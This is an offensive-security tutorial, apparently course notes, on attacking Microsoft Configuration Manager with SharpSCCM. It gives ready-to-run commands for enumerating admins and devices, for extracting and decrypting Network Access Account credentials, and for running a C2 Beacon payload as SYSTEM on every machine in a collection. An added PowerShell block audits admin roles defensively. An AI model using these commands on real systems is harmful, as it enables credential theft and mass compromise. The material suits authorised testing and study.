Microsoft Configuration Manager

Microsoft Configuration Manager (often shortened to ConfigMgr or MCM) was previously named System Center Configuration Manager (SCCM) and then Endpoint Configuration Manager (MECM). The most commonly used name is still SCCM.

SCCM's role is to help with system management tasks such as application & software deployments, updates and compliance configuration & reporting.

Its ability to connect multiple sites helps with scalability, particularly when dealing with different geographic locations.

- Enumeration

First we should enumerate which devices are being managed, and who the administrative users are. This does not require any special privileges in the domain, in SCCM or on the endpoint.

SharpSCCM (https://github.com/Mayyhem/SharpSCCM) helps with this.

execute-assembly C:\Tools\SharpSCCM\bin\Release\SharpSCCM.exe local site-info --no-banner

To do the same manually:

Get-WmiObject -Class SMS_Authority -Namespace root\CCM | select Name, CurrentManagementPoint | fl

We can also check the DACL on the CN=System Management container in AD for machines that have Full Control over it (as this is a prerequisite of SCCM setup in a domain):

execute-assembly C:\Tools\SharpSCCM\bin\Release\SharpSCCM.exe get site-info -d cyberbotic.io --no-banner

Enumerating users, groups, computers, collections, administrators, etc. does require some level of privilege in SCCM. SCCM employs an RBAC security model: the lowest role is "Read-Only Analyst" and the highest is "Full Administrator". Many other roles exist, such as "Asset Manager", "Infrastructure Administrator" and "Software Update Manager" (a description of each can be found here: https://learn.microsoft.com/en-us/mem/configmgr/core/understand/fundamentals-of-role-based-administration).

Furthermore, the "scope" of these roles can be restricted to individual collections as needed by the administrative user.

Administrative users can then be found using get class-instances SMS_Admin:

execute-assembly C:\Tools\SharpSCCM\bin\Release\SharpSCCM.exe get class-instances SMS_Admin --no-banner
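The same SMS_Admin class can be audited from the administrator's side to review who holds which roles over which collections. The following PowerShell is an added example, not code from the page or the SharpSCCM project; it assumes the caller has at least Read-Only Analyst rights and that $SiteServer names a host running the SMS Provider.

```powershell
# Added example: audit SCCM role-based administration via the SMS Provider.
# Assumes $SiteServer runs the SMS Provider and the caller can read SMS_Admin.
param(
    [Parameter(Mandatory)] [string] $SiteServer
)

# SMS_ProviderLocation (namespace root\SMS) maps site codes to provider hosts.
$provider = Get-WmiObject -ComputerName $SiteServer -Namespace 'root\SMS' `
    -Class SMS_ProviderLocation |
    Where-Object ProviderForLocalSite |
    Select-Object -First 1
if (-not $provider) { throw "No SMS Provider found on $SiteServer" }

# Site-specific namespace, e.g. root\SMS\site_PS1
$ns = "root\SMS\site_$($provider.SiteCode)"

# RoleNames and CollectionNames are lazy properties on SMS_Admin:
# call Get() on each instance so they are populated.
$admins = Get-WmiObject -ComputerName $provider.Machine -Namespace $ns -Class SMS_Admin |
    ForEach-Object { $_.Get(); $_ }

foreach ($admin in $admins) {
    [pscustomobject]@{
        LogonName   = $admin.LogonName
        IsGroup     = [bool]$admin.IsGroup
        Roles       = ($admin.RoleNames -join ', ')
        Collections = ($admin.CollectionNames -join ', ')
        # A Full Administrator scoped to the default "All Systems" collection
        # can deploy to every managed device; flag such assignments for review.
        HighRisk    = ($admin.RoleNames -contains 'Full Administrator') -and
                      ($admin.CollectionNames -contains 'All Systems')
    }
}
```

Run it from Windows PowerShell; on PowerShell 7 replace Get-WmiObject with Get-CimInstance and fetch the lazy properties with Get-CimInstance -InputObject.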

To see members of a collection:

execute-assembly C:\Tools\SharpSCCM\bin\Release\SharpSCCM.exe get collection-members -n {collection name} --no-banner

To get all devices:

execute-assembly C:\Tools\SharpSCCM\bin\Release\SharpSCCM.exe get devices --no-banner

To obtain more information on each device:

execute-assembly C:\Tools\SharpSCCM\bin\Release\SharpSCCM.exe get devices -n {device name} -p Name -p FullDomainName -p IPAddresses -p LastLogonUserName -p OperatingSystemNameandVersion --no-banner

To return devices where the given user was the last to log in:

execute-assembly C:\Tools\SharpSCCM\bin\Release\SharpSCCM.exe get devices -u {username} -p IPAddresses -p IPSubnets -p Name --no-banner

- Network Access Account Credentials

Domain-joined computers authenticate to SCCM Software Distribution Points (SDPs), which are basically just SMB shares, but there may also be computers that are not domain-joined and cannot authenticate this way.

Network Access Account credentials (NAAs) are domain credentials intended to be used by non-domain-joined computers to access the SDPs over the network. They are passed to the machines as part of the SCCM machine policies, then encrypted using DPAPI and stored locally. If they are present, privileged users can retrieve these credential blobs via WMI or directly from disk and decrypt them to recover plaintext credentials.

execute-assembly C:\Tools\SharpSCCM\bin\Release\SharpSCCM.exe local naa -m wmi --no-banner

execute-assembly C:\Tools\SharpSCCM\bin\Release\SharpSCCM.exe local naa -m disk --no-banner

These credentials should only have read access to the SDP, but they are often over-privileged.

- Lateral Movement

With Full or Application Administrator privileges over a device or a collection, we can deploy scripts or applications to aid in lateral movement.

To execute a command on every device in a collection (for example, DEV):

execute-assembly C:\Tools\SharpSCCM\bin\Release\SharpSCCM.exe exec -n {collection name} -p C:\Windows\notepad.exe --no-banner

By default, the above will execute Notepad as the user currently logged into each machine. If a user is not logged in, then the command won't execute. We can force it to execute as SYSTEM using the -s parameter, and this will execute on every machine regardless of whether a user is currently logged in or not.

We can then upload and execute a payload, for example a DNS Beacon payload:

execute-assembly C:\Tools\SharpSCCM\bin\Release\SharpSCCM.exe exec -n DEV -p "C:\Windows\System32\cmd.exe /c start /b \\dc-2\software\dns_x64.exe" -s --no-banner
